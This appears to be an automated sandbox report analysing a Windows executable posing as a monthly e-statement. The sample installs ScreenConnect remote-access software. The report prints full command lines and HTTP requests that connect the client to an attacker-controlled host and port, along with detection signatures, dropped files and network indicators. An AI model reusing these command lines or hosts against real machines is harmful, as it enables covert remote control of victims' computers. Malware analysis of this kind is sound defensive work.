Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
monthly-eStatementForum120478962.Client.exe

Overview

General Information

Sample name:monthly-eStatementForum120478962.Client.exe
Analysis ID:1551950
MD5:27bd2490fd75556aab2df57ea7c1147f
SHA1:4eb9656ede1fed23fdaeb67815afcd489ded0f77
SHA256:7d6376247db9e267f27d1d6bf32b48afcab0ad277706fc0135d803645f7852a5
Infos:

Detection

ScreenConnect Tool
Score:51
Range:0 - 100
Whitelisted:false
Confidence:100%

Compliance

Score:33
Range:0 - 100

Signatures

.NET source code references suspicious native API functions
AI detected suspicious sample
Contains functionality to hide user accounts
Detected potential unwanted application
Enables network access during safeboot for specific services
Reads the Security eventlog
Reads the System eventlog
AV process strings found (often used to terminate AV products)
Adds / modifies Windows certificates
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates or modifies windows services
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Drops certificate files (DER)
EXE planting / hijacking vulnerabilities found
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
May use bcdedit to modify the Windows boot settings
Modifies existing windows services
One or more processes crash
PE file contains an invalid checksum
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Dfsvc.EXE Network Connection To Uncommon Ports
Stores large binary data to the registry
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected ScreenConnect Tool

Classification

  • System is w10x64
  • monthly-eStatementForum120478962.Client.exe (PID: 7160 cmdline: "C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exe" MD5: 27BD2490FD75556AAB2DF57EA7C1147F)
    • dfsvc.exe (PID: 2628 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe" MD5: B4088F44B80D363902E11F897A7BAC09)
      • ScreenConnect.WindowsClient.exe (PID: 7440 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" MD5: 20AB8141D958A58AADE5E78671A719BF)
        • ScreenConnect.ClientService.exe (PID: 7484 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • WerFault.exe (PID: 7788 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7160 -s 332 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 6932 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • svchost.exe (PID: 2120 cmdline: C:\Windows\system32\svchost.exe -k LocalService -s W32Time MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ScreenConnect.ClientService.exe (PID: 7512 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session" "1" MD5: 361BCC2CB78C75DD6F583AF81834E447)
    • ScreenConnect.WindowsClient.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.WindowsClient.exe" "RunRole" "c62c9dea-32aa-435a-858b-87f989247e7c" "User" MD5: 20AB8141D958A58AADE5E78671A719BF)
  • svchost.exe (PID: 7728 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • WerFault.exe (PID: 7764 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 7160 -ip 7160 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • svchost.exe (PID: 7844 cmdline: C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
    C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
      SourceRuleDescriptionAuthorStrings
      00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
        00000001.00000002.3157733053.000001E8B3FFF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
          00000007.00000002.1569444555.000000000315F000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
            Process Memory Space: dfsvc.exe PID: 2628JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
              Process Memory Space: ScreenConnect.WindowsClient.exe PID: 7440JoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security
                Click to see the 1 entries
                SourceRuleDescriptionAuthorStrings
                7.0.ScreenConnect.WindowsClient.exe.e10000.0.unpackJoeSecurity_ScreenConnectToolYara detected ScreenConnect ToolJoe Security

                  System Summary

                  barindex
                  Source: Network ConnectionAuthor: Nasreddine Bencherchali (Nextron Systems): Data: DestinationIp: 192.168.2.7, DestinationIsIpv6: false, DestinationPort: 49706, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe, Initiated: true, ProcessId: 2628, Protocol: tcp, SourceIp: 194.59.30.201, SourceIsIpv6: false, SourcePort: 443
                  Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 6932, ProcessName: svchost.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:09:35.005158+010020229301A Network Trojan was detected4.175.87.197443192.168.2.749772TCP
                  2024-11-08T11:10:13.054100+010020229301A Network Trojan was detected20.12.23.50443192.168.2.749993TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-08T11:09:27.640004+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749730TCP
                  2024-11-08T11:09:29.098621+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749737TCP
                  2024-11-08T11:09:34.163926+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749771TCP
                  2024-11-08T11:09:35.536470+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749779TCP
                  2024-11-08T11:09:37.158581+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749790TCP
                  2024-11-08T11:09:38.514160+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749798TCP
                  2024-11-08T11:09:41.447672+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749814TCP
                  2024-11-08T11:09:43.298710+010020098971A Network Trojan was detected194.59.30.201443192.168.2.749825TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 88.9% probability
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F21000 LocalAlloc,LocalAlloc,GetModuleFileNameW,CertOpenSystemStoreA,LocalAlloc,LocalAlloc,CryptQueryObject,LocalFree,CryptMsgGetParam,CryptMsgGetParam,LocalAlloc,LocalAlloc,CryptMsgGetParam,CertCreateCertificateContext,CertAddCertificateContextToStore,CertFreeCertificateContext,LocalFree,CryptMsgGetParam,LocalFree,LocalFree,CryptMsgGetParam,CryptMsgGetParam,CertFindAttribute,CertFindAttribute,CertFindAttribute,LoadLibraryA,GetProcAddress,Sleep,CertDeleteCertificateFromStore,CertDeleteCertificateFromStore,CertCloseStore,LocalFree,LocalFree,LocalFree,0_2_00F21000
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior

                  Compliance

                  barindex
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeEXE: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exeJump to behavior
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: certificate valid
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49706 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49748 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49754 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49760 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49771 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49779 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49798 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 194.59.30.201:443 -> 192.168.2.7:49814 version: TLS 1.2
                  Source: monthly-eStatementForum120478962.Client.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe0.1.dr, ScreenConnect.WindowsFileManager.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdbU source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClickOnceRunner\Release\ClickOnceRunner.pdb source: monthly-eStatementForum120478962.Client.exe
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B435D000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4246000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB7000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1567594933.0000000002CD2000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3155817267.00000000029B0000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.3156144988.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.dll.1.dr, ScreenConnect.ClientService.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdbe source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1563335386.0000000000C4D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe0.1.dr, ScreenConnect.ClientService.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.1.dr, ScreenConnect.WindowsBackstageShell.exe0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000007.00000000.1558755338.0000000000E12000.00000002.00000001.01000000.0000000B.sdmp, ScreenConnect.WindowsClient.exe0.1.dr, ScreenConnect.WindowsClient.exe.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdbW] source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EB3000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4242000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4383000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1570550715.000000001C112000.00000002.00000001.01000000.0000000F.sdmp, ScreenConnect.Windows.dll0.1.dr, ScreenConnect.Windows.dll.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B424A000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B4325000.00000004.00000800.00020000.00000000.sdmp, dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EBB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 00000007.00000002.1569312203.0000000002F12000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.1.dr, ScreenConnect.Client.dll0.1.dr
                  Source: Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: dfsvc.exe, 00000001.00000002.3157733053.000001E8B3EAB000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.ClientService.exe, 00000008.00000002.1568117293.0000000005462000.00000002.00000001.01000000.0000000E.sdmp, ScreenConnect.Core.dll.1.dr, ScreenConnect.Core.dll0.1.dr
                  Source: C:\Users\user\Desktop\monthly-eStatementForum120478962.Client.exeCode function: 0_2_00F24A4B FindFirstFileExA,0_2_00F24A4B

                  Networking

                  barindex
                  Source: C:\Users\user\AppData\Local\Apps\2.0\RH07BTXR.RY4\8448B9TM.6ZZ\scre..tion_25b0fbb6ef7eb094_0018.0002_69b7fe775fd0d375\ScreenConnect.ClientService.exeRegistry value created: NULL ServiceJump to behavior
                  Source: global trafficTCP traffic: 192.168.2.7:49851 -> 194.59.30.201:8041
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: Joe Sandbox ViewIP Address: 194.59.30.201 194.59.30.201
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49737
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49771
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49730
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49798
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.175.87.197:443 -> 192.168.2.7:49772
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49790
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49814
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49825
                  Source: Network trafficSuricata IDS: 2009897 - Severity 1 - ET MALWARE Possible Windows executable sent when remote host claims to send html content : 194.59.30.201:443 -> 192.168.2.7:49779
                  Source: Network trafficSuricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.12.23.50:443 -> 192.168.2.7:49993
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzipConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.manifest HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Client.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.ClientService.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Windows.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.WindowsClient.exe HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficHTTP traffic detected: GET /Bin/ScreenConnect.Core.dll HTTP/1.1Host: voicemail-lakeleft.topAccept-Encoding: gzip
                  Source: global trafficDNS traffic detected: DNS query: voicemail-lakeleft.top
                  Source: global trafficDNS traffic detected: DNS query: time.windows.com
                  Source: global trafficDNS traffic detected: DNS query: popwee2.zapto.org
                  Source: svchost.exe, 0000000E.00000002.3155342046.000002094E437000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000002.3157747586.000002094ED37000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000E.00000003.1857229199.000002094ED6D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://Passport.NET/STS
